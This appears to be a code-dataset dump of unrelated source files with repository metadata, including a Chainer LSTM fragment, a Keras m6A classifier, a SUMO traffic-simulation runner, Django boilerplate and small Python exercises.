decoder_lstm = chainer.links.StatelessLSTM(in_size=embedding_size, out_size=n_units)
output_layer = chainer.links.Linear(n_units, vocab_size)
x_len = len(x_dataset[0])
# c, h は初期化するべき
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
h_list = []
for i, x in enumerate(x_dataset):
print "-" * 10
x = embID(x)
x_len = x.data.shape[0]
h_len = h.data.shape[0]
print "x_len:", x_len
print "h_len:", h_len
if x_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [x_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [x_len], axis=0)
# 処理済みのhをリストに追加
h_list.append(h_stop)
print "h:", h.data.shape
print "c:", c.data.shape
c, h = encoder_lstm(c, h, x)
# print h.data
h_list.append(h)
# appendの順番的にリバースしておいた方が自然?
h_list.reverse()
h_encoded = chainer.functions.concat(h_list, axis=0)
print h_encoded.data.shape
# print h_encoded.data
def _make_tag(_batchsize, tag=0):
shape = (_batchsize,)
return np.full(shape, tag, dtype=np.int32)
x_len = len(x_dataset[0])
c = chainer.Variable(np.zeros((x_len, n_units), dtype=np.float32))
# h = chainer.Variable(np.zeros((x_len, out_size), dtype=np.float32))
h = h_encoded
start_tag = _make_tag(batchsize, tag=0)
start_tag = [chainer.Variable(start_tag)]
end_tag = _make_tag(batchsize, tag=1)
end_tag = [chainer.Variable(end_tag)]
# y = start_tag
decode_start_idx = 0
# decode
# y_datasetは<s>で始まる前提にする?
# ミニバッチ化する時に<eos>の扱いが面倒なので、データの前処理のときに
# [0, 1, 2, 3, <eos>]
# [0, 3, <eos>]
# [0, 1, 2, <eos>]
# とするほうが良さげ
y_dataset = list(y_dataset)
# for target in y_dataset:
for y, t in zip(start_tag + y_dataset[:-1], y_dataset[1:]):
print "-" * 10
y_embedding = embID(y)
# y_len = y_embedding.data.shape[0]
y_len = y_embedding.data.shape[0]
# t_len = t.data.shape[0]
h_len = h.data.shape[0]
target_len = t.data.shape[0]
# print t
# print t_len
print "y_len:", y_len
print "target_len:", target_len
if target_len < h_len:
h, h_stop = chainer.functions.split_axis(h, [target_len], axis=0)
c, c_stop = chainer.functions.split_axis(c, [target_len], axis=0)
if target_len < y_len:
y_embedding, _stop_y_embedding = chainer.functions.split_axis(y_embedding, [target_len], axis=0)
print "y_embedding:", y_embedding.data.shape
print "h:", h.data.shape
c, h = encoder_lstm(c, h, y_embedding)
predict = output_layer(h)
print "predict:", predict.data.shape
print h
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
# embID_decoder()
# loss = functions.softmax_cross_entropy(y, t)
# x = embID(x)
# x_len = x.data.shape[0]
# h_len = h.data.shape[0]
| [
"nanigashi03@gmail.com"
] | nanigashi03@gmail.com |
65e893cd076a735f16f7fe5a29f4a839759724bc | 8dc333b7823c2cc5f4bb4adb75da37dcab06495f | /Section1.py | f0b657a08e18c2e71c97fe025deaf7856ec5a962 | [] | no_license | Mud-Fire/Math_Homework | cdb3c7729d7799a4ceeed2b506a239d305d5a608 | 119c26ab4c544e7652ac449661d2a39cd8b79480 | refs/heads/master | 2021-05-07T15:03:10.286846 | 2017-11-08T11:44:11 | 2017-11-08T11:44:11 | 109,968,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 12:53:13 2017
@author: zb
"""
#获取需要计算的项数
strN = input("Please enter an integer greater than 2:")
countN = int(strN)
#记录精确值
sumExact = 0.5 * (1.5-1/countN - 1/(countN+1))
#记录从小到大加法运算的和
sumOrder = 0
#记录从大到小加法运算的和
sumReOrder = 0
#每次循环的N值初始化
countNOrder = 2
countNReOrder = countN
if countN > 1:
#对N项进行循环相加
while countNOrder <= countN:
print(countNOrder,countNReOrder)
sumOrder += 1/(countNOrder**2-1)
sumReOrder += 1/(countNReOrder**2-1)
countNOrder += 1
countNReOrder -= 1
#对结果进行打印比较
print("===========result==================")
print("Order summation %f"%sumOrder)
print("Reverse order summation %f"%sumReOrder)
print("Exact Value %f"%sumExact)
else:
print("Please enter an integer greater than 2 ") | [
"noreply@github.com"
] | Mud-Fire.noreply@github.com |
837f178ec38d14871743e1d84aa11312970b3087 | ae9f2d64c8d0fc711d426e80e41bbce158ab7a4e | /build/config.gypi | 8529efc74c687d82ee2470bca8a5e886d916f502 | [] | no_license | aitchkhan/Real-Time-Chat-with-Node-js | 2863c3b9a173d1807acd5696decb74f66ddd79a7 | 201b7c6126c28f09415699521b6401349bf5cee3 | refs/heads/master | 2021-01-23T16:40:01.118218 | 2015-11-08T12:46:42 | 2015-11-08T12:46:42 | 34,112,637 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_has_winsdk": "true",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "ia32",
"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\aitchkhan\\.node-gyp\\0.12.2",
"copy_dev_lib": "true",
"standalone_static_library": 1
}
}
| [
"aitchkhan@gmail.com"
] | aitchkhan@gmail.com |
bbf45532ab46317e7c548a735d5a2663e074b126 | e9263f1f1a780e831464626ffcc74a9eeb2b2f12 | /print_request.py | 6ea534ce1cc3bef70a40a813e279197625d05893 | [] | no_license | OPEOStudio/kraft_bootstrap | bd26bb9bdd187961b36a2a1753f325fe45515a06 | e5e0e07694cd792aa82107832714d3a90696e6ac | refs/heads/master | 2020-04-06T18:57:23.106134 | 2019-01-16T10:05:12 | 2019-01-16T10:05:12 | 157,719,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import requests
import json
### PRINT THE REQUEST
# Script to print the request, to make sure that all the right request elements are being sent
# DOESN'T WORK FOR NOW
def print_r(string, url, data, headers, params):
# Put headers, params back into dictionnary
#print("headers: "+headers) ## Allowed me to test that headers is well a dict right now
#headers_dict = json.loads(headers)
#params_dict = json.loads(params)
print("headers : "+str(headers))
# Define the Request object
request = requests.Request(string, url, data = data, headers = headers, params = params)
print("request: "+str(request))
# Prepare the request
prepared = request.prepare()
# Calls the printing step
pretty_print_POST(prepared)
def pretty_print_POST(request):
"""
At this point it is completely built and ready
to be fired; it is "prepared".
However pay attention at the formatting used in
this function because it is programmed to be pretty
printed and may differ from the actual request.
"""
print(" ")
print('{}\n{}\n{}\n\n{}'.format(
'-----------START-----------',
request.method + ' ' + request.url,
'\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items()),
request.body,
))
| [
"36651512+musiquarc@users.noreply.github.com"
] | 36651512+musiquarc@users.noreply.github.com |
25859d62514ea506faa2e5384810904d8205659b | 78560437a0cc6c1e34ab654c32f5fab465530aeb | /EstruturaSequencial/16_Casa_tintas.py | 33770d4450d1d1c267287eb062f08bf53000ce0c | [] | no_license | StefanOliveira/ExerciciosPython | bec15ab3fb0c10aebde1e2d8e5992fd9b77bb2c8 | f7b51276e2e2ed7bb4160615b49a5df24c50e248 | refs/heads/master | 2020-03-20T14:26:51.306691 | 2018-08-20T19:33:16 | 2018-08-20T19:33:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | nQtdMts = float(input('Informe a area em metros que será pintada: '))
nLitros = nQtdMts / 3.0
nLatas = int(nLitros / 18.0)
if (nLitros % 18 != 0):
nLatas += 1
print ('Você precisa de',nLatas,'latas de tinta')
print ('Total a pagar:',nLatas * 80)
| [
"noreply@github.com"
] | StefanOliveira.noreply@github.com |
e74628558b410dabd6460047e5def4308c79a579 | d153be2b35d7274bfadc305af19ee5f6827efb07 | /captain_console/cart/migrations/0004_auto_20200514_2204.py | 3ecf0942392a7f84050e3aac1fef658200e62178 | [] | no_license | bjorgvin16/verklegt2 | 1796ee6b4e8e4a6ab8fe5f1776109d56e4777d05 | f833243c5f48e54817fe105f33ce216ec66c3c6c | refs/heads/master | 2022-07-26T03:04:14.805467 | 2020-05-15T23:08:53 | 2020-05-15T23:08:53 | 259,272,640 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | # Generated by Django 3.0.6 on 2020-05-14 22:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cart', '0003_order_orderdate'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='quantity',
),
migrations.AddField(
model_name='cart',
name='quantity',
field=models.IntegerField(default=1),
),
]
| [
"margriette123@gmail.com"
] | margriette123@gmail.com |
2933d2996ff2c284d1fd6b90cd4dfcbf24fdc883 | 8953c8dce654ae32a80adf873376ea5566daead7 | /eif3a_full_m6aReader.py | 5854751b65e91f4e21efdba142d57127f35c3467 | [] | no_license | yuxuanwu17/m6a_dp | 5e17e86b2ea2133e69beec0eab8abc7877d90276 | f3a5966f9abcce7077839024a71f01a139689967 | refs/heads/master | 2022-11-20T15:06:34.470254 | 2020-07-21T14:27:15 | 2020-07-21T14:27:15 | 280,642,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,201 | py | #%%
# To pkeras_model=None training, we import the necessary functions and submodules from keras
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dropout, Reshape, Dense, Activation, Flatten
from keras.layers.convolutional import Conv1D, MaxPooling1D
from keras.optimizers import Adadelta, SGD, RMSprop;
import keras.losses;
from keras.constraints import maxnorm;
from keras.utils import normalize, to_categorical
from keras.layers.normalization import BatchNormalization
from keras import regularizers
from keras.callbacks import EarlyStopping, History, ModelCheckpoint
from keras import backend as K
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, precision_recall_curve, auc
from pandas import DataFrame
#%%
def load_data():
df = pd.read_csv("eif3a_full_test_m6aReader.csv")
# print(df)
n = len(df.columns)
train = int(n / 2)
x_train = df.iloc[:, 2:train]
x_test = df.iloc[:, (train + 1):(n - 1)]
x_test = DataFrame(x_test)
x_test = x_test.dropna()
# print(x_test)
x_train = np.expand_dims(x_train, axis=1)
x_test = np.expand_dims(x_test, axis=1)
y_train = np.array([1, 0])
y_train = y_train.repeat(int((df.shape[0]) / 2))
y_train = np.mat(y_train).transpose()
y_test = np.array([1, 0])
y_test = y_test.repeat(int((x_test.shape[0] / 2)))
y_test = np.mat(y_test).transpose()
# print(x_test.shape)
# print(x_train.shape)
# print(y_test.shape)
# print(y_train.shape)
return x_train, x_test, y_test, y_train
def precision(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
return precision
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
#%%
def build_model(x_train):
one_filter_keras_model = Sequential()
one_filter_keras_model.add(
Conv1D(filters=90, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01),
input_shape=x_train.shape[1::]))
one_filter_keras_model.add(Activation('relu'))
one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
one_filter_keras_model.add(Dropout(0.25))
one_filter_keras_model.add(
Conv1D(filters=100, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01)))
one_filter_keras_model.add(Activation('relu'))
one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
one_filter_keras_model.add(Dropout(0.25))
one_filter_keras_model.add(Flatten())
one_filter_keras_model.add(Dense(1210))
one_filter_keras_model.add(Activation("relu"))
one_filter_keras_model.add(Dense(1))
one_filter_keras_model.add(Activation("sigmoid"))
one_filter_keras_model.summary()
one_filter_keras_model.compile(loss='binary_crossentropy', optimizer='adam',
metrics=['accuracy', precision, recall])
return one_filter_keras_model
#%%
def compileModel(model, x_train, x_test, y_test, y_train):
model = model
x_train = x_train
x_test = x_test
y_test = y_test
y_train = y_train
earlystop = EarlyStopping(monitor='val_loss',
min_delta=0,
patience=10,
verbose=1)
filepath = "weights.best.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint, earlystop]
epoch = 100
batchsize = 128
history = model.fit(x_train, y_train, batch_size=batchsize, epochs=epoch,
validation_data=(x_test, y_test),
callbacks=callbacks_list)
return history
# ################################
# print('draw the loss plot')
# ###############################
def lossplot(history):
ori_val_Loss = history.history['val_loss']
loss = history.history['loss']
epochs = np.arange(len(history.epoch)) + 1
plt.plot(epochs, ori_val_Loss, label='val loss')
plt.plot(epochs, loss, label='loss')
plt.title("Effect of model capacity on validation loss\n")
plt.xlabel('Epoch #')
plt.ylabel('Validation Loss')
plt.legend()
# plt.show()
plt.savefig('/home/yuxuan/dp/m6aReader/loss_m6areader.png')
print("")
print("The loss plot is saved \n")
def roc(model, x_test, y_test):
print('Start drawing the roc curve \n')
from sklearn.metrics import roc_curve
from sklearn.metrics import auc
y_pred_keras = model.predict(x_test).ravel()
fpr_keras, tpr_keras, thresholds_keras = roc_curve(y_test, y_pred_keras)
auc_keras = auc(fpr_keras, tpr_keras)
plt.cla()
plt.figure(1)
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_keras, tpr_keras, label='AUROC (area = {:.3f})'.format(auc_keras))
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve')
plt.legend(loc='best')
# plt.show()
print('AUROC (area = {:.3f})'.format(auc_keras))
plt.savefig('/home/yuxuan/dp/m6aReader/ROC_m6areader.png')
return auc_keras
def prcurve(model, x_test, y_test):
lr_probs = model.predict_proba(x_test)
lr_precision, lr_recall, _ = precision_recall_curve(y_test, lr_probs)
lr_auc = auc(lr_recall, lr_precision)
# summarize scores
print('PRAUC: auc=%.3f' % (lr_auc))
# plot the precision-recall curves
no_skill = len(y_test[y_test == 1]) / len(y_test)
pyplot.cla()
pyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')
pyplot.plot(lr_recall, lr_precision, marker='.', label='Logistic')
# axis labels
pyplot.xlabel('Recall')
pyplot.ylabel('Precision')
# show the legend
pyplot.legend()
# show the plot
# pyplot.show()
plt.savefig('/home/yuxuan/dp/m6aReader/PRAUC_m6areader.png')
return lr_auc
def MCC(model,x_test,y_test):
from sklearn.metrics import matthews_corrcoef
yhat = model.predict_classes(x_test)
mcc = matthews_corrcoef(y_test, yhat)
print('MCC = {:.3f}'.format(mcc))
return mcc
def ACC(model,x_test,y_test):
from sklearn.metrics import accuracy_score
yhat = model.predict_classes(x_test)
acc = accuracy_score(y_test, yhat)
print('ACC = {:.3f}'.format(acc))
return acc
def main():
x_train, x_test, y_test, y_train = load_data()
model = build_model(x_train)
history = compileModel(model, x_train, x_test, y_test, y_train)
lossplot(history)
auc = roc(model, x_test, y_test)
prauc =prcurve(model, x_test, y_test)
mcc =MCC(model,x_test,y_test)
acc = ACC(model,x_test,y_test)
results = np.array([auc,prauc,mcc,acc])
np.savetxt('/home/yuxuan/dp/m6aReader/eif3a_full_m6aReader.csv', results, delimiter=',')
if __name__ == '__main__':
main()
| [
"yuxuan.wu17@gmail.com"
] | yuxuan.wu17@gmail.com |
f346c7f538f075ee8c1577c89e089a80c6232447 | 571322962890d461a6b142b42f6ed66be23fb299 | /blog/admin.py | a6493140ae0a0212665647a59d6e8f86f532b104 | [] | no_license | Cyapy/my-first-blog | e94b1e012b2760506a091f9d32018d31fbd237a8 | ec94ef330634377a2f6844de5989ad0cb594c970 | refs/heads/master | 2020-07-23T10:58:54.566605 | 2019-09-10T10:59:43 | 2019-09-10T10:59:43 | 207,536,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.contrib import admin
#from .models import Company
from .models import Post
#admin.site.register(Company)
admin.site.register(Post)
| [
"cz.arnold1977@gmail.com"
] | cz.arnold1977@gmail.com |
a49e2c4eeddaf540dfd5ba698a9805c8b952a483 | c9f3ecbf78f890ff598591e6bf326b79f7b22608 | /Python/Chapter 1/ex32.py | 84d63a023dcbb5ab1aa4d9b366425ad84de0ea83 | [] | no_license | bomcon123456/DSA_Learning | f17ceacadaf0398e233c9740d9d24ee5fc76fa69 | d943ec1aa7315d0e34fd3505ccb5a62a415ecf73 | refs/heads/master | 2020-06-25T08:58:50.280816 | 2020-01-02T02:36:17 | 2020-01-02T02:36:17 | 199,265,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | def ex32():
c = ""
res = 0
plusNext = False
while True:
c = input()
arr = c.split(" ")
if len(arr) == 1:
if c == "+":
res = res
plusNext = True
elif c == "=":
print(res)
return res
else:
if plusNext:
res += float(c)
else:
res = res * 10 + float(c)
else:
raise IOError("Unsupported operations")
ex32()
| [
"termanteus@aos-iMac.local"
] | termanteus@aos-iMac.local |
a160ac123f2a744d1d10d17cfc24c6bec46d13dd | a5bd2739e15716de801d621e6a756c943cb937e4 | /states/base/_grains/reboot_required.py | f8aa8cad002ccccebb1d1d44b3ecc72277a3fcf3 | [] | no_license | ashmckenzie/salt | 00be6ec559769c7aff84f3ed97eb2162ee6bfcc4 | dc67b06e99ad61f203752867ce54dc31a48b9800 | refs/heads/master | 2020-12-23T11:16:58.096353 | 2017-06-21T00:28:26 | 2017-06-21T00:28:26 | 33,473,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | # -*- coding: utf-8 -*-
import os.path
def reboot_required():
grains = {}
grains['reboot_required'] = os.path.isfile('/var/run/reboot-required')
return grains
| [
"ash@the-rebellion.net"
] | ash@the-rebellion.net |
7d1d73ca2a8cb31e859f930a208e08029fffaba2 | 650e8c0eef602308e61a6d3c9476bb550c3e4a8c | /StartingOutWithPy/Chapter 02/ProgrammingExercises/09_C_to_F_temp_converter.py | af802349730447421820e6c8bf6b9b99b15d352f | [] | no_license | cosmos512/PyDevoir | 7895d21d70c94074cacab79ca55dc1fca00bd514 | 3eabad164a62c7ef7919e7847033e67e7b0644a3 | refs/heads/master | 2021-01-23T18:59:21.136075 | 2014-08-03T20:10:25 | 2014-08-03T20:10:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | # Write a program that converts Celsius temperatures to Fahrenheit temperatures.
# The formula is as follows:
# 9
# F = - C + 32
# 5
# The program should ask the user to enter a temperature in Celsius, and then
# display the temperature converted to Fahrenheit.
C = float(input('What is the Celsius temperature you saw?: '))
F = 9 / 5 * C + 32
print("Well, then that means it's", format(F, '.1f'), "degrees Fahrenheit.")
| [
"lunlunart@gmail.com"
] | lunlunart@gmail.com |
f6c9eb2dd9064e19a427efac7876905fb88841f9 | 9093f2a305bba661ae671134648a251612226c83 | /manage.py | aaa2b9aa399e90031f7f7112abf86277daa20ef1 | [] | no_license | Regaron/ECommerce | 7b631290f0d709f0d9c52663f705ee0db9e6564e | 55c70e4a9a24192f80906f1d6893fc3dc96e2355 | refs/heads/master | 2020-03-25T04:35:31.878809 | 2019-11-16T14:07:53 | 2019-11-16T14:07:53 | 141,599,613 | 0 | 0 | null | 2018-07-26T04:35:43 | 2018-07-19T15:38:22 | Python | UTF-8 | Python | false | false | 541 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ECommerce.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"sujanbudhathoki123@gmail.com"
] | sujanbudhathoki123@gmail.com |
c36efc1843c3021c334a94bbf23e9898a24991eb | d0235e8259db910f577f418c644f2861b10df3ab | /rectangle_teddybear.pyde | 4c1bd4dd6e664665136a64109ccded12a53fd6b7 | [] | no_license | Ganesh2608/CG | 6b865f35da6f11066defb0bc9cbcef067098ca16 | aa926e54d0089cf22c110f13a01d7313129fc705 | refs/heads/master | 2020-03-27T13:19:45.141485 | 2018-11-12T06:33:12 | 2018-11-12T06:33:12 | 146,603,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | pyde | def setup():
#global viewport;
size(700,800);
#viewport = createGraphics();
def draw():
fill(255);
rect(200,120,95,70); #head
rect(225,190,45,160); #body line
rect(270,215,80,27); #hands
rect(145,215,80,27); #hands
rect(270,323,80,27); #legs
rect(145,323,80,27); #legs
rect(230,144,8,8); #eyes left
rect(259,144,8,8); #eyes right
rect(245,155,8,13); #nose
rect(235,173,28,7); #mouth
fill(200,0,0);
rect(239,175,20,5); #tongue
fill(0);
rect(232,146,4,4); #eyes left ball
rect(261,146,4,4); #eyes right ball
| [
"noreply@github.com"
] | Ganesh2608.noreply@github.com |
fcaa9a254056832dd56dc34f39f25cba73e8989e | b04d95eb1d2769945b9d93f223d93815796206f7 | /simulation/execution/startSimulation.py | 7e9fc845db74aaca641f7c3fff0bad9605023008 | [] | no_license | DrRoad/Traffic-Simulation-in-SUMO-and-statistics-generator | 19cbca58f55b3ac64ed598641d3c69afa3edbe52 | c37627c5f32afbac904657d092d149db62cc9148 | refs/heads/master | 2022-01-09T03:06:44.135211 | 2019-07-23T19:52:43 | 2019-07-23T19:52:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,196 | py | import os
import sys
import argparse
import uuid
import datetime
import requests
from lxml import etree
import input_preprocessing as ip
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
# tripInfo = "../data/input-statistics/tripinfo.xml"
# edgeLane = "../data/input-statistics/edgelane.xml"
simulation_id = ""
scenario_id = ""
scenario_description = ""
# contains TraCI control loop
def run():
# step = 0
while traci.simulation.getMinExpectedNumber() > 0:
traci.simulationStep()
# print(step)
# step += 1
traci.close()
sys.stdout.flush()
def create_simulation_id():
global simulation_id
# simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-") + str(uuid.uuid4())
simulation_id = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
simulation_id = "2054-07-19-19-35-29"
def get_scenario_id(filepath):
tree = etree.parse(filepath)
root = tree.getroot()
global scenario_id
global scenario_description
for elem in root.iter('scenario'):
scenario_id = elem.attrib['id']
if scenario_id == '1':
scenario_description = "morning rush hour"
elif scenario_id == '2':
scenario_description = "noon"
else:
scenario_description = "afternoon rush hour"
def add_id_to_tripinfo(filepath):
path = filepath + "tripinfo.xml"
tree = etree.parse(path)
root = tree.getroot()
for elem in root.iter('tripinfos'):
elem.set('id', simulation_id)
elem.set('scenario_id', scenario_id)
elem.set('scenario_description', scenario_description)
tree.write(path)
print('The statistics id was added', simulation_id)
def add_scenario_to_edge_file(filepath, type_of_file='edgelane'):
if type_of_file == 'edge':
path = filepath + "edge.xml"
else:
path = filepath + "edgelane.xml"
tree = etree.parse(path)
root = tree.getroot()
for elem in root.iter('meandata'):
elem.set('scenario_id', scenario_id)
elem.set('scenario_description', scenario_description)
tree.write(path)
print('The scenario id and description are added' + " to " + type_of_file, scenario_id + ' and' + scenario_description)
def create_xml_file(filepath, freq, sim_id):
path = filepath + "additional.xml"
# print(path)
with open(path, 'w') as fb:
fb.write('<additional>')
lane = "<laneData "
id = "id=" + "\"" + sim_id + "\" "
file = "file=" + "\"" + "edgelane.xml" + "\" "
frequency = "freq=\"" + str(freq) + "\"" + "/>"
element = lane + id + file + frequency
edge = "<edgeData "
id = "id=" + "\"" + sim_id + "\" "
file = "file=" + "\"" + "edge.xml" + "\" "
frequency2 = "/>"
element = element + edge + id + file + frequency2
fb.write(element)
fb.write('</additional>')
return path
def Main():
create_simulation_id()
parser = argparse.ArgumentParser()
parser.add_argument('--config', default="../data/input-simulation/scenario2.sumocfg", type=str, help='Give the path to the sumocfg file')
# parser.add_argument('--additional', default="../data/input-statistics/additional.xml", type=str, help = 'Give the path to the additional file for tripinfo output')
parser.add_argument('--lanepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--edgepath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the lanepath to be saved..')
parser.add_argument('--trippath', default="../data/output-simulation/", type=str,
help='Give the filepath where you want the tripinfo to be saved.')
parser.add_argument('--color', default="origin", type=str,
help='Type whether you want cars to be colored based on origin (default) or destination.')
parser.add_argument('--freq', default=600, type=int)
args = parser.parse_args()
success = ip.set_origin_dest_veh_color(args.color)
sumoBinary = "sumo-gui"
get_scenario_id(args.config)
print(scenario_id, scenario_description)
# # traci starts sumo as a subprocess and then this script connects and runs
sumoCMD = [sumoBinary, "-c", args.config,
"--additional-files", create_xml_file(args.lanepath, args.freq, simulation_id), "--tripinfo-output",
args.trippath + 'tripinfo.xml']
print(sumoCMD)
traci.start(sumoCMD)
run()
add_id_to_tripinfo(args.trippath)
add_scenario_to_edge_file(args.edgepath, 'edge')
add_scenario_to_edge_file(args.edgepath)
# # make post request
# # Set the name of the XML file.
#
# trips_xml = "../data/output-simulation/" + "tripinfo.xml"
# url_trips = "http://ios19kirch.ase.in.tum.de/api/simulation/input/trip"
#
# edge_lane_xml = "../data/output-simulation/" + "edgelane.xml"
# url_edge_lane = "http://ios19kirch.ase.in.tum.de/api/simulation/input/flow"
#
# edges_xml = "../data/output-simulation/" + "edge.xml"
# url_edges = "http://ios19kirch.ase.in.tum.de/api/simulation/input/mainroads"
#
# headers = {
# 'Content-Type': 'text/xml'
# }
#
# with open(trips_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_trips, data=the_data)
# print(r.content)
#
# with open(edge_lane_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edge_lane, data=the_data)
# print(r.content)
#
# with open(edges_xml, 'r') as xml:
# # Give the object representing the XML file to requests.post.
# the_data = xml.read()
# r = requests.post(url_edges, data=the_data)
# print(r.content)
if __name__ == "__main__":
Main() | [
"ge36voj@mytum.de"
] | ge36voj@mytum.de |
509e9d56682a9e7858514eff9ca4d13b748a8656 | 4ad9ae34e6d015ef865e93db71ac909531561ebe | /main.py | c65492feaa5b6e0797b04be2a760656191b624be | [] | no_license | chetanpujari5105/100DaysOfCodeInPython2021-Day-7 | 951e51cc420d5ea5dc2a6ee32e979e12ba466348 | 25055f6aa2030d27df0e721ced0a716404ccffa5 | refs/heads/main | 2023-02-13T21:45:10.933264 | 2021-01-10T18:18:43 | 2021-01-10T18:18:43 | 328,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | states_of_america = ["Delaware", "Pennsylvania", "New Jersey", "Georgia", "Connecticut", "Massachusetts", "Maryland", "South Carolina", "New Hampshire", "Virginia", "New York", "North Carolina", "Rhode Island", "Vermont", "Kentucky", "Tennessee", "Ohio", "Louisiana", "Indiana", "Mississippi", "Illinois", "Alabama", "Maine", "Missouri", "Arkansas", "Michigan", "Florida", "Texas", "Iowa", "Wisconsin", "California", "Minnesota", "Oregon", "Kansas", "West Virginia", "Nevada", "Nebraska", "Colorado", "North Dakota", "South Dakota", "Montana", "Washington", "Idaho", "Wyoming", "Utah", "Oklahoma", "New Mexico", "Arizona", "Alaska", "Hawaii"]
print(states_of_america)
print(states_of_america[1])
dirty_dozen = ["Strawberries", "Spinach", "Kale", "Nectarines", "Apples", "Grapes", "Peaches", "Cherries", "Pears", "Tomatoes", "Celery", "Potatoes"]
dirty_dozen.append("Banana")
print(dirty_dozen[-1])
| [
"noreply@github.com"
] | chetanpujari5105.noreply@github.com |
c1cc453fc746b6bc98f3d3c7890760918bc8317e | 5080f19c30738bff67e49eff7b91d3ba4315cd21 | /practice_pizza2020/test.py | ceb9be11a12ed3a579279bbd924093222874d8ef | [] | no_license | VincentZ-42/HashCode2020 | ad1edb71c20500f7ed0ab9b600e1fef926a839be | d30b3ae2549549dd133e134e3c3c77ecea0a5fb8 | refs/heads/master | 2021-01-07T12:59:54.862461 | 2020-02-20T22:57:09 | 2020-02-20T22:57:09 | 241,702,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # **************************************************************************** #
# #
# ::: :::::::: #
# test.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: vzhao <vzhao@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/02/19 11:56:47 by vzhao #+# #+# #
# Updated: 2020/02/19 20:59:48 by vzhao ### ########.fr #
# #
# **************************************************************************** #
import os
def subset_sum(file_path, file, OG, numbers, target, partial =[]):
"""
Function traverses through list of numbers to find the combination
that matches the target value (Function runs recursively)
Args:
(str) file_path = path to out the file
